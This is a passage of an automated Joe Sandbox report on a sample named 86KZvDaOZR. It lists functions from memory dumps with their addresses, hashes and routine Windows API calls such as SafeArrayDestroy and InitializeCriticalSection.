Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: da883116688e5964e85ab8cb08474539c577f30c4400fc99d36dba549b0cbb36
Instruction ID: 4d1bdd49ff0ca2ba132f717168b61ab3318257bf987562bfee8c107a9225556e
Opcode Fuzzy Hash: da883116688e5964e85ab8cb08474539c577f30c4400fc99d36dba549b0cbb36
Instruction Fuzzy Hash: 18314D70E01A189FCB00CFA9CD80B9EB7F9AF89204F208586E419E7651DB79DE41CF50

Function 6CF29118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 6b7c8b7201cb74bc6c4219af55bddaa6e6a1821b3b38212de47cae9a00477af7
Instruction ID: 644a1b77cffc4b83b2cf4072c7e94dadeec0ddb620541a5bce94c63b548ec1a6
Opcode Fuzzy Hash: 6b7c8b7201cb74bc6c4219af55bddaa6e6a1821b3b38212de47cae9a00477af7
Instruction Fuzzy Hash: 45314D70E01A189FCB00CFA9CD80B9EB7F9AF89204F20859AE519E7651DB75EE41CF50

Function 6CF292C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 3dc487a15e879050e7fc32d96dc0b833a6c264355bd2fb9d1a31802617ad44ce
Instruction ID: 29ea21c0ef6fa9e3640dd07596bbe316d9656cde0887bb55a1edac6da4b15587
Opcode Fuzzy Hash: 3dc487a15e879050e7fc32d96dc0b833a6c264355bd2fb9d1a31802617ad44ce
Instruction Fuzzy Hash: 5F313B70E01A189FCB00CBA9CC80B9EB7F9AF89204F20858AE419E7651DB75EE41CF50

Function 6CF29237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: c14185d0b11b927388dad340df8131d80fbb479b90131b22ede35f3773504d38
Instruction ID: 85e9a910bf106b29de1bf76031e68cca0ea5caf99824122d7845cc8889df7d89
Opcode Fuzzy Hash: c14185d0b11b927388dad340df8131d80fbb479b90131b22ede35f3773504d38
Instruction Fuzzy Hash: 51313A70E01A189FCB00DFA9CC80B9EB7F9AF89204F208586E419E7651DB75EE41CF50

Function 6CF2C150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF2C180
SafeArrayPutElement.OLEAUT32(00000000,6CF23749,?), ref: 6CF2C1B8
VariantClear.OLEAUT32(?), ref: 6CF2C1C4
VariantCopy.OLEAUT32(6CF23749,?), ref: 6CF2C21B
VariantClear.OLEAUT32(?), ref: 6CF2C22F
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF2C23E

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
String ID:
API String ID: 3979206172-0
Opcode ID: 2c9e83fcceb38043fa70d4a768be5d11bbf5e834c077af4a64ed6f5f6918f7e4
Instruction ID: e01bb4068f6cece11b92b0df5579747bb79f6679e7a40b6240136d2b5a0a8409
Opcode Fuzzy Hash: 2c9e83fcceb38043fa70d4a768be5d11bbf5e834c077af4a64ed6f5f6918f7e4
Instruction Fuzzy Hash: 7B316C75A05609AFDB01DFE8C894BAEBBB8EF4A304F118529E915D7350EB35D901CB60

Function 6CF17370 Relevance: 9.1, APIs: 6, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6CF811FD,000000FF,?,6CF18B80,00000000,?,00000000,?,6CF18C13,?,?), ref: 6CF17415
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6CF811FD,000000FF,?,6CF18B80,00000000,?,00000000,?,6CF18C13,?,?), ref: 6CF1741B
std::exception::exception.LIBCMT ref: 6CF1743D
__CxxThrowException@8.LIBCMT ref: 6CF17452
std::exception::exception.LIBCMT ref: 6CF17461
__CxxThrowException@8.LIBCMT ref: 6CF17476

Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C04
Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C1E
Part of subcall function 6CF69BB5: __CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
String ID:
API String ID: 189561132-0
Opcode ID: e984c56214c35bc6c9ca547bac951d4e65f1987b644b1a9c2ad796bbbcdc2d95
Instruction ID: dd017e1dbd9f8df2e8852ca578141694d6594a20b83ff239ec5a44c8cb9f5211
Opcode Fuzzy Hash: e984c56214c35bc6c9ca547bac951d4e65f1987b644b1a9c2ad796bbbcdc2d95
Instruction Fuzzy Hash: 203159B2905A449FC750CF69C880A9AFBF8FF59310B54895EE95A97B00E731E604CBA1

Function 6CF28C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 936fd1d0300e8c5abd2ad93ae6a0f66566a4309807a174d6ac0f2e2fd64b3a05
Instruction ID: c70056164ac1cd5e00f6101a66ad5bd929118fad97173bbd7707437fa954ca08
Opcode Fuzzy Hash: 936fd1d0300e8c5abd2ad93ae6a0f66566a4309807a174d6ac0f2e2fd64b3a05
Instruction Fuzzy Hash: B6316C70E01A189FDB10DBA9CC80B9EB7FAAF89204F24858AE419E7641CB75ED41CF50

Function 6CF28D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 92ad0b4446cea240b4414431bf5d87ac5b0878a160c267cac382eb8852f29f10
Instruction ID: 7ed3887af534f96afb1a39e7106089289309a17c2f5ba83c6f412855c48b8d69
Opcode Fuzzy Hash: 92ad0b4446cea240b4414431bf5d87ac5b0878a160c267cac382eb8852f29f10
Instruction Fuzzy Hash: DA315A71E01A189FCB10CBA9CC80B9EB7F9AF89204F20868AE419E7641DB75ED45CF50

Function 6CF28E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 1c58ddac3f30264862050ea1652f3ab5f4feb798e5f5f4388a3e600655f8205a
Instruction ID: 6d9f779e1cd3948bafe0e4f0a13e83b1edafbb0f488b4dc18c5409df378f5812
Opcode Fuzzy Hash: 1c58ddac3f30264862050ea1652f3ab5f4feb798e5f5f4388a3e600655f8205a
Instruction Fuzzy Hash: DD314D71E01A189FCB10DFA9CC80B9EB7F9AF89204F24868AE419E7655CB75ED41CF50

Function 6CF28F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 8aa535370b684f0187e5b8fa482d121ddf91a61d43fd065277d41f217391b141
Instruction ID: 458badc18bc174888961852ce6f7ed45268d0e9eb646d7ed80c553fa9de70ab6
Opcode Fuzzy Hash: 8aa535370b684f0187e5b8fa482d121ddf91a61d43fd065277d41f217391b141
Instruction Fuzzy Hash: BA315A71E01A189FCB10CBA9CC80B9EB7FAAF89304F24868AE419E7641C775DD41CF50

Function 6CF2884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 38920bd62fbb6a0c3221fc67faee64abf0cf24c79ce55824f253d56a1311ea96
Instruction ID: 8b7d46a190512a42fd5b99f09b7e99662356dfe4a6760423b40712af209599cc
Opcode Fuzzy Hash: 38920bd62fbb6a0c3221fc67faee64abf0cf24c79ce55824f253d56a1311ea96
Instruction Fuzzy Hash: 9B314C71E01A189FDB10CBA9CC80B9EB7FAAF89204F24868AE419E7641C775ED41CF50

Function 6CF28B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2AEBF

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: f06bc167a3be090fc61322523fac80c870a2acc472aa92f01d8c4089ae22675f
Instruction ID: e096abc597cbd85a90679c71c14070647a67018197b4fe8e8141246aef9db81c
Opcode Fuzzy Hash: f06bc167a3be090fc61322523fac80c870a2acc472aa92f01d8c4089ae22675f
Instruction Fuzzy Hash: 59314C71E01A189FCB10DBA9CC80B9EB7F9AF89204F24858AE419E7651CB75DD45CF50

Function 6CF20561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 0905d762109ecf5e7ca238f0bff9ed6b8441717716064202a0b9c07b5d1efb04
Instruction ID: 1e306d4dc184f0dc01b41bf865a22a69cf01a32f9a284b1213a2e8a4ac246598
Opcode Fuzzy Hash: 0905d762109ecf5e7ca238f0bff9ed6b8441717716064202a0b9c07b5d1efb04
Instruction Fuzzy Hash: BB313CB1E116189FCB10CFA9CD84B9DB7B9AF89314F34858AE418E7652CB76DD408F50

Function 6CF200B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF223B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF223FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF2240F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
